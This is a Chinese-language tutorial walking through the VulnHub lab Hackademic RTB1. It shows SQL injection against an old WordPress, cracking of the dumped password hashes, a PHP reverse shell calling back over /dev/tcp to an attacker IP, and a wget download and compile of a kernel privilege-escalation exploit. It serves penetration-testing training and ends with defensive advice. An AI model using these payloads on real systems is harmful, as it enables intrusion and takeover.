Linux渗透实战：Hackademic RTB1靶场提权教学文档

0x1 靶场概述

靶机简介

Hackademic: RTB1是vulnhub上的一个渗透测试靶机，主要考察以下技能：

• 信息收集与端口扫描
• WordPress漏洞利用
• SQL注入（手工与sqlmap）
• 后台密码爆破与登录
• 文件上传与反弹shell
• 内核提权技术

靶机下载

下载地址：https://www.vulnhub.com/entry/hackademic-rtb1,17/

0x2 信息收集阶段

1. 主机探测

使用arp-scan探测局域网内主机：

arp-scan -l

发现靶机IP为10.10.10.134

2. 端口扫描

使用nmap进行TCP端口扫描：

nmap -sS -A -p- 10.10.10.134

发现仅开放80端口，22端口SSH服务关闭

UDP端口扫描（可选）：

nmap -sU --top-ports 20 10.10.10.134

3. 漏洞扫描

使用nmap脚本扫描漏洞：

nmap --script=vuln -p80 10.10.10.134

发现几个老版本漏洞（如CVE-2007-6750、CVE-2011-3192），但实际利用价值不大

0x3 Web渗透阶段

1. Web服务信息收集

访问http://10.10.10.134，发现静态HTML页面，提示获取root权限并读取/root/key.txt

查看页面源代码，发现WordPress CMS框架信息：

• 版本：1.5.1.1（较旧版本，可能存在漏洞）

2. SQL注入漏洞利用

手工联合注入步骤：

1. 测试注入点：

   • 访问带参数的URL，如?cat=1'，发现报错信息：

     SELECT * FROM wp_categories WHERE cat_ID = 1\' LIMIT 1
     

2. 确定列数：

   1 order by 1,2,3,4,5   # 正常
   1 order by 1,2,3,4,5,6 # 报错
   

   确定有5列

3. 联合查询测试：

   0 union select 1,2,3,4,5
   

   发现第2列有回显

4. 获取数据库信息：

   0 union select 1,version(),3,4,5
   0 union select 1,database(),3,4,5
   

   确认数据库名为"wordpress"

5. 获取用户表数据：

   0 union select 1,group_concat(user_login,0x2d,user_pass,0x2d,user_level),3,4,5 from wp_users
   

   获取到用户凭证：

   1-NickJames-21232f297a57a5a743894a0e4a801fc3-1
   2-JohnSmith-b986448f0bb9e5e124ca91d3d650f52c-0
   3-GeorgeMiller-7cbb3252ba6b7e9c422fac5334d22054-10
   4-TonyBlack-a6e514f9486b83cb53d8d932f9a04292-0
   5-JasonKonnors-8601f6e1028a8e8a966f6c33fcd9aec4-0
   6-MaxBucky-50484c19f1afdaf3841a0d821ed393d2-0
   

sqlmap自动化注入（可选）：

sqlmap -u "http://10.10.10.134/Hackademic_RTB1/?cat=0" --dbs --batch

3. 密码破解与后台登录

1. 识别密码哈希：

   hash-identifier "7cbb3252ba6b7e9c422fac5334d22054"
   

   确认是MD5加密

2. 使用cmd5.org解密：

   • GeorgeMiller的密码7cbb3252ba6b7e9c422fac5334d22054解密为q1w2e3

3. 登录WordPress后台：

   • 访问http://10.10.10.134/wp-login.php
   • 使用凭证：GeorgeMiller / q1w2e3

4. 文件上传与反弹shell

1. 修改WordPress设置允许上传PHP文件：

   • 进入"Settings" > "Miscellaneous"
   • 启用文件上传并允许PHP文件

2. 准备PHP反弹shell：

   <?php exec("/bin/bash -i >& /dev/tcp/10.10.10.128/4444 0>&1"); ?>
   

   或使用revshells.com生成

3. 上传PHP文件（如bin.php）并访问

4. Kali监听：

   nc -lvnp 4444
   

0x4 提权阶段

1. 基本信息收集

在获取的shell中执行：

uname -a

输出：

Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux

2. 内核提权

1. 搜索相关漏洞：

   searchsploit linux kernel 2.6.3 | grep -i 'Privilege Escalation'
   

2. 筛选合适的漏洞：

   searchsploit linux kernel 2.6.3 | grep -i 'Privilege Escalation' | grep -v 'Ubuntu' | grep -v 'CentOS' | grep -v 'Debian' | grep -v 'RedHat'
   

   重点关注：

   • 10018.sh
   • 15285.c

3. 下载并编译15285.c：

   • 本地启动HTTP服务：

     python3 -m http.server 80
     

   • 靶机下载：

     wget http://10.10.10.128/15285.c -O /tmp/15285.c
     

   • 编译执行：

     gcc 15285.c -o 15285
     chmod -R 777 15285
     ./15285
     

3. 获取flag

cat /root/key.txt

输出：

Yeah!! You must be proud becouse you ve got the password to complete the First Reallistic Hackademic Challenge (Hackademic.RTB1) :)
$ _ d & jgQ >> ak\# b "(Hx" o < la_ %
Regards,
mr. pr0n || p0wnbox.Team || 2011
http://p0wnbox.com

0x5 总结与知识点

关键知识点

1. 信息收集：arp-scan、nmap扫描、目录扫描(dirsearch)
2. SQL注入：手工联合注入、sqlmap使用
3. 密码破解：MD5识别与解密
4. WordPress利用：后台登录、文件上传配置
5. 反弹shell：PHP exec方法、nc监听
6. 内核提权：searchsploit使用、漏洞筛选、编译执行

防御建议

1. 及时更新WordPress版本
2. 使用参数化查询防止SQL注入
3. 限制文件上传类型
4. 定期更新内核补丁
5. 使用强密码并定期更换

扩展学习资源

1. WordPress安全指南
2. Linux内核漏洞数据库
3. SQL注入防御